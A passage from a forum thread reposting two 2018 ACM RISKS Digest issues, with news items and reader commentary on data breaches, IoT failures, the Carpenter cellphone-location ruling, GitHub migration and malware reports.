    interference. For example, the Evanston, Illinois incident described in
    RISKS-29.88, where a faulty neon sign power supply emitted RF signals
    sufficient to block cell service in the immediate area (and also block car
    owners from using their wireless dongles, which is what made that item
    RISKS-worthy). Stingray-style devices can also target individual phones (or
    vehicles with built-in phones) and block or corrupt their outgoing calls.

    I'm looking forward to the presentation at Black Hat 2025, where researchers
    will show how to subvert every current model of driverless vehicle with a
    combination of wireless network attacks, cell phone interference to block
    the remote emergency "driver", LIDAR attacks like those described in
    http://eprint.iacr.org/2017/613 and spoofed law-enforcement overrides.
    It's going to be such a mess we're going to need a new name for it, maybe
    "the Internet of Things, on wheels".

    ------------------------------

    Date: Wed, 13 Jun 2018 14:36:29 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: Microsoft, Github, & distributed revision control (Ohno)

    This completely misunderstands what git and github are - the whole point of
    git is that every developer has an identical copy of the source
    repository. "Migrating away" in this sense is as simple as creating an
    account on another central service and doing a push.

    The problem is that Github does a lot more than just host your program - it
    provides all the infrastructure behind it like bug tracking, enhancement
    requests, communications forum etc. THIS is value-add which git does not
    provide, and THIS is what is not easy to migrate from one central service to
    another.

    ------------------------------

    Date: [lost]
    From: R A Lichtensteiger <ri...@throwawaydomain.com>
    Subject: Re: Florida skips gun background checks for a year after employee
    forgets login (Goldberg, RISKS-30.82)

    This blog post is incorrect and misleading.

    The Florida Department of Agriculture Licensing department did, in fact,
    perform the required background checks on applicants for licenses to carry
    concealed weapons or firearms. According to later news reports checks were
    done through FCIC (Florida Criminal Information Computer system) and NCIC
    (National Criminal Information Computer system -- the national FBI
    fingerprint data base) and they also did a NICS check (National Instant
    Check System), which is the name-based background check system.

    What did NOT happen was that 365 applications where the background check
    flagged one or more disqualifiers were not immediately rejected. That is a
    problem. But it is NOT the same problem as claiming that the checks weren't
    done. It's also 0.001% of the applications processed during that time
    period.

    It should also be noted that this was on LICENSE APPLICATIONS, not purchases
    of firearms. So 365 people who shouldn't have gotten licenses did. When
    the failure was discovered, those 365 licenses were reviewed (as they should
    have been initially). 74 were cleared and 291 still had disqualifiers.

    As a final observation, the same NICS check that was part of the background
    check for the application is done, per federal law, at EVERY sale at a gun
    dealer, so any PURCHASES by these people whould have been flagged by ATF and
    denied.

    http://www.orlandoweekly.com/Blogs/...ams-office-failed-to-review-background-checks

    The risks? Myriad

    1) Relying on a cybersecurity blog for mainstream news
    2) Rushing to be the first one to post on Risks and not
    waiting until the facts were reported.
    3) Drawing Risks into US gun politics.

    ------------------------------

    Date: Wed, 13 Jun 2018 13:40:59 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Re: Florida skips gun background checks for a year after employee
    forgets login (Lichtensteiger)

    0. Thanks for your response.
    1. Often cybersecurity blogs are only place reporting cybersecurity
    risks -- at first, or (sometimes) ever.
    2. Ditto. Posting isn't "rushing", it's reporting on what's been seen.
    Then come responses.
    3. Rather than related to gun politics, this was reported as a forgotten
    password issue. It could have been a state DMV or NRA. It happened to be
    related to firearms -- but that doesn't make it off topic/limits.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.73
    ************************
     
  8. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.74

    RISKS List Owner

    Jul 5, 2018 3:12 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Thursday 5 July 2018 Volume 30 : Issue 74

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Cyber-researchers Don't Think Feds or Congress Can Protect Against
    Cyberattacks (Defense One)
    Babylon claims its chatbot beats GPs at medical exam (bbc.com)
    Medical device security: Hacking prevention measures (HPE)
    Exactis said to expose 340-million records, more than Equifax breach (CNET)
    Supreme Court requires warrant for cellphone location data (Henry Baker)
    ICE hacked its algorithmic risk-assessment tool, so it recommended
    detention for everyone (BoingBoing)
    Energy company vulnerability allows access to customer accounts
    (Donald Mackie)
    Internet TV firmware update/soft powerswitch failure (Richard M Stein)
    Widespread Google Home outage: What NOT to do! (Lauren Weinstein)
    Cruel pranksters made NYC Internet kiosks play ice-cream truck tunes
    (Engadget)
    Swann home security camera sends video to wrong user (BBC)
    Hidden Microsoft Office 365 data gathering (LMG Security)
    Protecting civilians in cyberspace (Just Security)
    Rash of Fortnite cheaters infected by malware that breaks HTTPS
    encryption (Ars Technica)
    Really dumb malware targets cryptocurrency fans using Macs (Ars Technica)
    Sony Blunders By Uploading Full Movie to YouTube Instead of Trailer
    (TorrentFreak)
    Homeland Security subpoenas Twitter for data breach finder's account
    (Zack Whittaker)
    Wikipedia Italy Blocks All Articles in Protest of EU's Ruinous
    Copyright Proposals (Gizmodo)
    How a Major Computer Crash Showed the Vulnerabilities of EHRs (Medscape
    via Fr. Stevan Bauman)
    Apple 'Family Sharing' feature used by scammers to make purchases
    with hacked Apple IDs (Business Insider)
    ``Trump administration tells FCC to block China Mobile from U.S.''
    (Corinne Reichert)
    Google is training machines to predict when a patient will die
    (Los Angeles Times)
    So What The Heck Does 5G Actually Do? And Is It Worth What The Carriers
    Are Demanding? (Harold Fel)
    Leaks, riots, and monocles: How a $60 in-game item almost destroyed
    EVE Online (Ars Technica)
    Gaming disorder is only a symptom of a much larger problem (WaPo)
    Ticketmaster: How not to manage customers after a data breach.
    (Michael Kent)
    Re: Police, Law Enforcement, and corporate use of facial recognition
    and facial images in court (Kelly Bert Manning)
    Re: Florida skips gun background checks for a year after employee
    (Kelly Bert Manning)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Wed, 27 Jun 2018 20:52:12 PDT
    From: Peter G Neumann <neu...@csl.sri.com>
    Subject: Cyber-researchers Don't Think Feds or Congress Can Protect Against
    Cyberattacks (Defense One)

    Cyber Researchers Don’t Think Feds or Congress Can Protect Against Cyberattacks

    Quite evidently, the U.S. government has little clue about defending itself
    against cybersecurity attacks, and is consequently unprepared for any
    digital disasters.

    ------------------------------

    Date: Sat, 30 Jun 2018 10:28:47 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Babylon claims its chatbot beats GPs at medical exam (bbc.com)

    [od -c output attached for peace of mind]

    Chatbot claims to beat GPs at medical exam

    ``Claims that a chatbot can diagnose medical conditions as accurately as a
    GP have sparked a row between the software's creators and UK doctors.''

    Babylon's chatbot claims to out-achieve carbon-based physicians on the
    UK MRCGP (Membership Royal College of General Practitioners)
    examination. Babylon advocates their AI platform to complement a
    physician's judgment, not as a wholesale replacement.

    ``Babylon said that the first time its AI sat the exam, it achieved a
    score of 81%. It added that the average mark for human doctors was 72%,
    based on results logged between 2012 and 2017. But the RCGP said it had
    not provided Babylon with the test's questions and had no way to verify
    the claim.''

    Given commercial aspirations, and the skyward trajectory of health care
    service delivery, an attempt to capitalize on a ''cost-effective'' AI-based
    alternative is likely. Favorable legislation, and weak regulatory oversight,
    will induce businesses to pursue them despite potential public health risks.

    A randomized control trial must be performed. Any business that promotes and
    sells these AI diagnosis/treatment services must be required to enroll their
    own employees and immediate family members as participants. The trial
    outcome reviewers must be free from conflict of interest.

    ------------------------------

    Date: Mon, 2 Jul 2018 15:37:04 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Medical device security: Hacking prevention measures (HPE)

    With so many lives at stake, computer scientists and healthcare IT pros are
    motivated to develop strategies that keep patients safe from medical device
    hackers. They're making progress.

    Medical device security: Hacking prevention measures

    ------------------------------

    Date: Wed, 27 Jun 2018 18:50:14 -0400
    From: Richard Forno <rfo...@infowarrior.org>
    Subject: Exactis said to expose 340-million records, more than Equifax breach
    (CNET)

    Exactis said to have exposed 340 million records in massive leak

    We hadn't heard of the firm either, but it had data on hundreds of millions
    of Americans and businesses and leaked it, according to Wired.

    Abrar Al-Heeti
    June 27, 2018 2:14 PM PDT

    If you're a US citizen, your personal information -- your phone number, home
    address, email address, even how many children you have -- may have just
    become easily available to hackers in an alleged massive data leak.

    Florida-based marketing and data aggregation firm Exactis exposed a database
    containing nearly 340 million individual records on a publicly accessible
    server, Wired reported. Earlier this month, security researcher Vinny Troia
    found that nearly 2 terabytes of data was exposed, which seems to include
    personal information on hundreds of millions of US adults and millions of
    businesses, the report said.

    ``It seems like this is a database with pretty much every US citizen in it,''
    Troia told Wired.

    Exactis didn't immediately respond to a request for comment or confirmation.

    The alleged breach reportedly exposed highly personal information, such as
    people's phone numbers, home and email addresses, interests and the number,
    age and gender of their children. Credit card information and Social
    Security numbers don't appear to have been leaked. Troia told Wired that he
    doesn't know where the data is coming from, ``but it's one of the most
    comprehensive collections I've ever seen.''

    Because Exactis hasn't confirmed the leak, it's hard to know exactly how
    many people are affected. But Troia found two versions of the database that
    each had around 340 million records, with roughly 230 million on consumers
    and 110 million on business contacts, according to Wired. Exactis says on
    its website that it has over 3.5 billion consumer, business and digital
    records.

    The data leak is noteworthy not only for its breadth, but also for the depth
    of information the records have on people. Every record reportedly has
    entries that include more than 400 variables on characteristics like whether
    the person smokes, what their religion is and whether they have dogs or
    cats. But Wired noted that in some instances, the information is inaccurate
    or outdated.

    Just because people's financial information or Social Security numbers
    weren't leaked doesn't mean they're not at risk for identity theft. The
    amount of personal information that was exposed could still help scammers
    impersonate or profile them.

    Huge compromises to personal information have been making headlines
    lately. In 2017, Equifax was involved in a massive data breach of 145.5
    million people's data. And in October, Yahoo revealed that all 3 billion
    accounts were hacked in a 2013 breach.

    ------------------------------

    Date: Mon, 25 Jun 2018 07:09:23 -0700
    From: Henry Baker <hba...@pipeline.com>
    Subject: Supreme Court requires warrant for cellphone location data

    Nice to see that the ``Third Party Doctrine'' -- which gave the govt ``most
    favored nation status'' w.r.t. your data -- is finally being chipped away.

    However, as this law professor points out, this decision will have little
    practical effect.

    [Sorry for the length of this posting, but every point is salient.]

    The latest Supreme Court decision is being hailed as a big victory for digital privacy. It’s not.

    The latest Supreme Court decision is being hailed as a big victory for
    digital privacy. It's not.

    Carpenter forces police to get a warrant before getting some cellphone
    data. But other Fourth Amendment cases will undermine its impact.

    By Aziz Huq Updated Jun 23, 2018, 7:43am EDT

    Congratulations -- a closely divided US Supreme Court has just ruled in
    Carpenter v. United States that you have a constitutional right to privacy
    in the locational records produced by your cellphone use. Law enforcement
    now cannot ask Sprint, AT&T, or Verizon, for cell tower records that reveal
    your whereabouts through your phone's interaction with those towers, at
    least without a warrant.

    Carpenter builds on two earlier decisions. In 2011, the Court required a
    warrant before police placed a GPS tracker on a vehicle to track its
    movements. In 2014, it forbade warrantless searches of cellphone during
    arrests. Whatever it's other flaws, the Roberts Court thus seems to
    understand electronic privacy's importance.

    But there are a couple of things to know before toasting the Court's high
    regard for privacy in the digital age. The Roberts Court, building on what
    the preceding Rehnquist Court did, has created an infrastructure for Fourth
    Amendment law that makes it exceptionally easy for police to do a search,
    even when a warrant is required. The law also makes it exceptionally
    difficult for citizens to obtain close judicial oversight, even when the
    police have violated the Constitution. As a result of these background
    rules, even a decision as seemingly important as Carpenter is unlikely to
    have any dramatic effect on police practices.

    It's not just that our digital privacy is insufficiently protected, in other
    words. It's that our Fourth Amendment rights and remedies in general have
    been eroded. Once enough holes have been poked in the general system for
    vindicating Fourth Amendment interests, the decision to extend Fourth
    Amendment coverage to a new domain -- such as cell-site locational data --
    is just not terribly significant.

    Timothy Ivory Carpenter had been convicted of nine armed robberies based on
    witness testimony, but the prosecution also stressed in its closing argument
    records obtained from his cellphone company. Those records showed how
    Carpenter's phone interacted with the cell phone towers that carried its
    signal. As Chief Justice Roberts emphasized, the records painted a detailed
    picture of Carpenter's movements over 127 days.

    Yet the government did not use a warrant based on probable cause to obtain
    those cell-site records, relying instead on a statute called the Stored
    Communications Act.

    Forcing police to get a warrant is not much of a protection these days

    Consider first the core constitutional protection on which Chief Justice
    Robert's opinion in Carpenter hinged -- the requirement of a warrant based
    on probable cause from a judge before the police can acquire cell-site
    records that allow for detailed physical tracking of suspects' movements.

    >From now on, the police will usually have to get a warrant before seeking
    such information. But that offers limited protection. One reason: In other
    Fourth Amendment cases, the Court has held that it is not just life-tenured
    federal judges who can issue warrants. A warrant can also be obtained from
    a range of other officials, including municipal court clerks who have no law
    training and no tenure protection. Such clerical staff lack the skills and
    incentives to examine warrant applications closely to determine compliance
    with the law. Still, they are allowed to issue warrants.

    Even where there are no such court clerks, it is well known that police and
    prosecutors go ``judge shopping'' when a physical search or arrest is in
    play. Judges have varying reputations for being more or less careful in
    scrutinizing warrant applications. It is often well known which judges in a
    city or courthouse are more or less scrupulous. When police have a weak
    warrant application, they have a strong incentive to avoid judges who will
    give it a close read.

    These weaknesses in the warrant regime for physical searches or arrests are
    exacerbated when electronic data is at issue. Warrant applications for cell
    tower records often rest on technical details about the geographic and
    temporal scope of the search. These applications might in theory seek a
    quite varied range of information, including the target's location, the
    number of calls he made, and the manner in which he used apps.

    Review of the application will also require fine judgments about when
    information can be shared with other law enforcement agencies and government
    officials. Just because a prosecutor can obtain electronic data, for
    example, that surely doesn't mean she can hand it over to, say, a political
    appointee in the White House or a Department of Transportation employee who
    happens to be the subject's boyfriend.

    Because close scrutiny by an experienced and independent judge has become so
    easy to avoid, there is no guarantee these questions matters will get
    careful and independent consideration -- even if a warrant is sought and
    issued consistent with the main holding of Carpenter.

    The hurdle of ``probable cause'' has also been steadily lowered

    Assume that police are before a scrupulous judge. Even then, the background
    Fourth Amendment rules mean that they have a light burden to bear. As Chief
    Justice Robert's opinion today stresses, a warrant can be issued only based
    on ``probable cause.'' But in a series of earlier cases about physical
    searches, the Court has winnowed down the ``probable cause'' requirement to
    the showing of a mere ``fair probability'' that evidence of a crime will be
    found.

    This ``fair probability'' requirement has become easier to satisfy in recent
    decades because federal and state legislatures have created sweeping
    penalties for conspiracies to commit crimes and for accomplices.

    Showing a ``fair probability'' of a conspiracy to commit a crime is not
    difficult. Under federal law, for example, a criminal conspiracy
    exists if there's an agreement to commit any criminal act in the
    future, and one step -- even a lawful one -- taken to that end. In
    one case, for example, a Google search served as the ``overt act'' for
    an elaborate conspiracy charge, even in the absence of evidence of
    actual planned criminal conduct.

    This sweeping definition of criminal liability interacts with the weak
    ``probable cause'' rule. Police need only show a ``fair probability''
    that a single lawful action has been taken in relation to a criminal
    agreement, and they are entitled to a warrant. This is not hard to
    do.

    This problem is pervasive across Fourth Amendment law. But it has
    particular significance to cell-site locational data. Such data maps
    the movements of a group of people -- precisely the evidence that is
    routinely relevant to conspiracy charges. So with a conspiracy theory
    in hand, it will often be very easy for the police to meet the
    (exceedingly weak) probable cause standard.

    Would a warrant requirement have made a practical difference in
    Carpenter's case?

    In Carpenter's case, investigators had a confession from one of the
    participants in the string of armed robberies. They also had the cell
    numbers of other participants, including Carpenter's. These two
    pieces of information would almost certainly have been enough to allow
    the government to get a warrant on a conspiracy theory of probable
    cause.

    But imagine that the investigator couldn't even pull together evidence
    showing probable cause of a conspiracy. Imagine that they instead
    play fast and loose with the contents of the warrant application. For
    example, the application might rest on some dubious evidence, and the
    investigator might consciously choose not to confirm its accuracy.
    Once charges have been filed, could a defendant get the locational
    data thrown out on the grounds that the warrant application was based
    on false pretenses?

    Once again, general Fourth Amendment law makes this possible in theory
    but unlikely in practice. To get evidence acquired by a warrant
    tossed out of court, a defendant must show that an investigator acted
    with ``reckless disregard'' in preparing a warrant application. In most
    states and in federal court, there is no rule that permits the
    defendant to examine police or prosecutor records. Hence, the
    defendant often must make this recklessness showing without any
    documentary evidence of what the police did.

    It is therefore usually practically impossible for most defendants to
    challenge flawed search warrants. Again, warrants for electronic data
    are no different.

    Even if a defendant succeeds in getting a warrant quashed, moreover,
    the Supreme Court has said that a reviewing court of appeals must look
    again at the warrant -- now placing a thumb on the scales in favor of
    the investigating officer. In effect, when the government loses the
    rare case in which a defendant can show a warrant to be flawed, it
    gets a second chance to have the warrant restored by a court of
    appeals.

    Prosecutors can use illicitly obtained information if a suspect
    testifies

    Still, lean your imagination into the wind to imagine a defendant who
    has overcome all these constraints, and had a warrant quashed. The
    evidence from that flawed warrant can still be introduced at trial if
    the defendant chooses to testify. The Supreme Court established that
    rule in the 1971 case of Harris v. New York, on the grounds that if
    the defendant could give testimony, the government had the concomitant
    right to undermine it by whatever information was in its hands.

    As a result, even when the government has illegally acquired evidence,
    its possession of that evidence creates a strong incentive for
    defendants not to take the stand. Needless to say, this will often
    make the prosecutor's job easier.

    If a defendant chooses not to testify, that is still not the end of
    the story. The government can also argue that information gathered
    unlawfully without a warrant should be admitted because there was an
    emergency. Chief Justice Roberts explicitly carved out an emergency
    exception in his Carpenter opinion, citing the possibility of ``bomb
    threats, active shootings, and child abductions.'' In such cases, no
    warrant is required.

    Also, if the locational data was acquired without a warrant before
    Carpenter was decided, the Court held that it need not be kept out.
    Carpenter hence helps no one whose cell-site locational data was
    acquired before this week. And the Carpenter opinion also leaves open
    the possibility that police can acquire less than seven days of
    cell-site data without a warrant.

    Are there other paths for redress? Someone in Carpenter's shoes,
    whose Fourth Amendment rights have been violated, can technically sue
    the police for damages even if they are not charged with a criminal
    offense. The problem is that the Court has almost completely
    squelched the availability of damages for most constitutional wrongs,
    including the Fourth Amendment, through a series of technical
    anti-plaintiff rules.

    In short, the legal framework of Fourth Amendment remedies has been
    riddled with so many exceptions and loopholes that Carpenter's holding
    that a warrant is required to acquire cell-site locational data is
    likely to impose no great burden on the police.

    If police can't get the information through cellphone companies, they
    will turn up the heat on suspects

    But the facts around the electronic data in Carpenter make the Court's
    holding especially hollow. Locational data is held not only by
    telephone company. It is also contained on a person's phone, even if
    she chooses to disable locational tracking. (Certain apps can track
    locational data produced by a phone's internal sensors without the
    owner's knowledge or permission.) This data is generally accurate to
    a foot or so.

    Police can thus acquire location data -- and much more -- if they ask
    for consent to examine a phone. Extensive psychological research
    shows that most of the time -- especially if the suspect is a woman or
    a racial minority -- suspects are likely to say yes.

    General Fourth Amendment law says police can seek consent to make a
    search. In the physical search context, the Court has consistently
    ignored the fact that people often feel they have no choice but to
    acquiesce.

    Consider the leading Supreme Court case on consent searches, United
    States v. Drayton. Two men are traveling by bus in Florida, when
    police board the bus and question passengers about their trip. The
    first man is asked to ``consent'' to a pat down. He does -- and the
    officer finds blocks of cocaine taped to his groin. After this first
    man is led away in handcuffs, the officer turns to his traveling
    companion and says, ``Mind if I check you?'' The second man agrees.
    Drugs are found in exactly the same spot on his body. The Supreme
    Court holds that he consented to the search.

    My students, encountering Drayton for the first time, often have a
    moment of cognitive dissonance. Why, they wonder, did the suspect
    consent after he saw what happened to his friend? When I point out
    that both men were racial minorities in a jurisdiction with a history
    of police violence, and that neither was highly educated nor socially
    privileged, then the facts start to make more sense.

    Ironically, the Carpenter decision makes it more likely that police
    will aggressively exploit the weaknesses of the Court's consent
    case-law. By making it slightly more hassle to obtain cell-site
    locational data from a telephone company, the Court has encouraged
    police to exploit the frailty of its consent doctrine. That is, by
    making it harder to acquire electronic data from a third party, the
    Court has nudged police toward more forceful and unpleasant
    confrontations with citizens by which ``consent'' can be secured.

    This should not count as a ``success'' for Fourth Amendment freedoms.

    Electronic privacy rests on the rules and remedies that apply to the
    Fourth Amendment generally. In the past 40 years, those rules and
    remedies have been substantially eroded by a Court unwilling to
    constrain police.

    The result today is that even when a decision endorses Fourth
    Amendment protection -- and requires a warrant, as in Carpenter --
    that protection is easy to avoid, and likely ineffectual in practice.

    Aziz Huq is the Frank and Bernice J. Greenberg professor of law at the
    University of Chicago Law School.

    ------------------------------

    Date: June 27, 2018 at 08:09:05 GMT+9
    From: Richard Forno <rfo...@infowarrior.org>
    Subject: ICE hacked its algorithmic risk-assessment tool, so it recommended
    detention for everyone (BoingBoing)

    ICE hacked its algorithmic risk-assessment tool so it recommended detention for everyone

    One of the more fascinating and horrible details in Reuters' thoroughly
    fascinating and horrible long-form report on Trump's cruel border policies
    is this nugget: ICE hacked the risk-assessment tool it used to decide whom
    to imprison so that it recommended that everyone should be detained.

    This gave ICE a kind of empirical facewash for its racist and inhumane
    policies: they could claim that the computer forced them to imprison people
    by identifying them as high-risk. The policy let ICE triple its detention
    rate, imprisoning 43,000 people.

    http://boingboing.net/2018/06/26/software-formalities.html

    ------------------------------

    Date: Sat, 30 Jun 2018 08:01:30 +0930
    From: Donald Mackie <don...@iconz.co.nz>
    Subject: Energy company vulnerability allows access to customer accounts

    According to this story a customer alerted the company in November 2017.
    What is interesting is the pace and incompleteness of response, lack of
    information to customers and time for a complete fix.

    Apart from the (sadly) routine nature of the vulnerability story here, one
    of the risks I see is that of testing inherited legacy systems in company
    handovers/changes. A governance and due diligence question.

    http://www.stuff.co.nz/national/stu...y-beach-admitted-as-ceo-fronts-and-apologises

    Cue A-Z of system security joke.

    ------------------------------

    Date: Wed, 27 Jun 2018 19:18:41 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Internet TV firmware update/soft powerswitch failure

    While on vacation the home we rented was equipped with all manner of
    Internet of mistakes devices, including an Internet-connected television.

    At 0200 one morning, it switched on suddenly. Apparently, the owners --
    out of convenience or pure ignorance -- elected for firmware auto-
    updates.

    The family was startled, as the volume had been boosted by the flash
    memory save and reboot; the legacy off-state was not restored. The
    line-of-sight TV controls remained operative.

    Although the specific TV possesses features that can auto-detect user
    inactivity after a fixed duration, or if there's an extended loss of
    input signal, I cannot help imagining if the upgrade had bricked these
    soft switches, or it possessed a ``thermal runaway'' virus maliciously
    designed to ignite the unit.

    ------------------------------

    Date: Wed, 27 Jun 2018 12:17:44 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Widespread Google Home outage: What NOT to do!

    via NNSquad

    There is apparently a widespread -- possibly global -- Google Home
    outage. However, not all units are affected. Some of my units here are
    down, at least one is up. The down units act if they were factory
    reset and tell you to download the Home app. My recommendation is to
    NOT do so! DON'T CHANGE ANYTHING! Give Google time to deal with this
    from the server side.

    ------------------------------

    Date: Wed, 4 Jul 2018 09:13:06 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Cruel pranksters made NYC Internet kiosks play ice-cream truck tunes
    (Engadget)

    http://www.engadget.com/2018/07/03/linknyc-ice-cream-music-prank/

    ------------------------------

    Date: Wed, 27 Jun 2018 19:09:58 +0000
    From: Michael Marking <mar...@tatanka.com>
    Subject: Swann home security camera sends video to wrong user (BBC)

    http://www.bbc.co.uk/news/technology-44628399

    A leading security camera-maker has sent footage from inside a
    family's home to the wrong person's app.

    Swann Security has blamed a factory error for the data breach --
    which was brought to its attention by the BBC -- and said it was a
    ``one-off'' incident. However, last month another customer reported a
    similar problem saying his version of the same app had received
    footage from a pub's CCTV system. Swann said it was attempting to
    recover the kit involved in this second case. [...]

    The BBC first learned of the problem on Saturday, when a member of
    its staff began receiving motion-triggered video clips from an
    unknown family's kitchen. Until that point, Louisa Lewis had only
    received footage from her own Swann security camera, which she had
    been using since December. The development coincided with Ms
    Lewis's camera running out of battery power and requiring a
    recharge. [...]

    A Swann customer representative told Ms Lewis that nothing could be
    done until after the weekend. And it was only after the matter was
    flagged to the firm's PR agency on Monday that she stopped receiving
    video clips. [...]

    Even if this were a factory error, the system shouldn't have failed
    absent multiple errors: the design of the manufacturing process, even
    given active quality control, should not have been dependent on a
    single point of failure. Most important, this failure mode should not
    have been possible (ok, the likelihood shouldn't have been anything
    but vanishingly small).

    Moreover, this seems to have happened more than once.

    Designers of these systems should, at least as an exercise, treat
    manufacturers, distributors, retailers, and even users as potentially
    hostile entities. This is especially true since firms are highly
    unlikely to have ownership and control of the entire chain of
    operations. For example, the credentials for one unit might
    accidentally be swapped by a retailer for those of another. Gross
    negligence is a form of hostility, and it is grossly negligent to
    assume the absence of human error..

    ------------------------------

    Date: Thu, 28 Jun 2018 12:08:17 +0200
    From: Peter Houppermans <pe...@houppermans.net>
    Subject: Hidden Microsoft Office 365 data gathering (LMG Security)

    I came across this interesting post:

    http://lmgsecurity.com/exposing-the-secret-office-365-forensics-tool/

    Extract: ``An ethical crisis in the digital forensics industry came to a
    head last week with the release of new details on Microsoft's undocumented
    `Activities' API. A previously unknown trove of access and activity logs
    held by Microsoft allows investigators to track Office 365 mailbox activity
    in minute detail. Following a long period of mystery and rumors about the
    existence of such a tool, the details finally emerged, thanks to a video by
    Anonymous and follow-up research by CrowdStrike.

    Now, investigators have access to a stockpile of granular activity data
    going back six months -- even if audit logging was not enabled. For victims
    of Business Email Compromise (BEC), this is huge news, because investigators
    are now far more likely to be able to `rule out' unauthorized access to
    specific emails and attachments.

    Maybe I'm just picky, but I like to know what software is logging what
    activity, due to compliance and confidentiality needs. The two are
    frequently in conflict, so precision is essential.

    >From a privacy perspective, it appears it's time to revert to parchment,
    quill and ink..

    ------------------------------

    Date: Tue, 3 Jul 2018 18:24:27 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Protecting civilians in cyberspace (Just Security)

    Over the years, we've explored (and often shied away from) the idea of
    infosec pros as a kind of military or police force, protecting the general
    public from the digital/cybersecurity bad guys.

    So I find this article on protecting civilians in cyberspace, seemingly by
    people outside the traditional infosec community, quite interesting. The
    emphasis seems to be on human rights, rather than general computer use, but
    there are some intriguing ideas just the same.

    http://www.justsecurity.org/58838/protecting-civilians-cyberspace-ideas-road/

    [Interesting name. It is Never *Just* Security, as (1) it is often
    something else as well, and (2) Security is never Just. PGN]

    ------------------------------

    Date: Tue, 3 Jul 2018 20:27:56 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Rash of Fortnite cheaters infected by malware that breaks HTTPS
    encryption (Ars Technica)

    Malware can read, intercept, or tamper with the traffic of any
    HTTPS-protected site.

    http://arstechnica.com/information-...cted-by-malware-that-breaks-https-encryption/

    ------------------------------

    Date: Tue, 3 Jul 2018 20:26:39 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Really dumb malware targets cryptocurrency fans using Macs
    (Ars Technica)

    A command spread through Slack and Discord channels to cryptocurrency users
    is a trap.

    http://arstechnica.com/information-...lware-targets-cryptocurrency-fans-using-macs/

    ------------------------------

    Date: Tue, 3 Jul 2018 17:43:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Sony Blunders By Uploading Full Movie to YouTube Instead of Trailer
    (TorrentFreak)

    Sony Pictures Entertainment's movie `Khali the Killer' is on release in the
    United States and, as is customary, a trailer has been uploaded to YouTube.
    However, on closer inspection, it appears that Sony uploaded the entire
    movie in error. Oops.

    http://torrentfreak.com/sony-blunders-uploading-full-movie-youtube-instead-trailer-180703/
    The price is right...

    [Monty Solomon noted this item:
    http://arstechnica.com/gaming/2018/...railer-to-youtube-posts-entire-movie-instead/
    PGN]

    ------------------------------

    Date: Mon, 2 Jul 2018 15:04:13 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Homeland Security subpoenas Twitter for data breach finder's account
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 2 Jul 2018
    http://www.zdnet.com/article/homeland-security-subpoenas-twitter-for-data-breach-finders-account/

    Homeland Security has served Twitter with a subpoena, demanding the account
    information of a data breach finder, credited with finding several large
    caches of exposed and leaking data.

    The New Zealand national, whose name isn't known but goes by the handle
    Flash Gordon, revealed the subpoena in a tweet last month.

    Also: Homeland Security's own IT security is a hot mess, watchdog finds

    The pseudonymous data breach finder regularly tweets about leaked data found
    on exposed and unprotected servers. Last year, he found a trove of almost a
    million patients' data leaking from a medical telemarketing firm. A recent
    find included an exposed cache of law enforcement data by ALERRT, a Texas
    State University-based organization, which trains police and civilians
    against active shooters. The database, secured in March but reported last
    week, revealed that several police departments were under-resourced and
    unable to respond to active shooter situations.

    Homeland Security's export control agency, Immigration and Customs
    Enforcement (ICE), served the subpoena to Twitter on April 24, demanding
    information about the data breach finder's account.

    [Also noted by Gene Wirchenko. PGN]

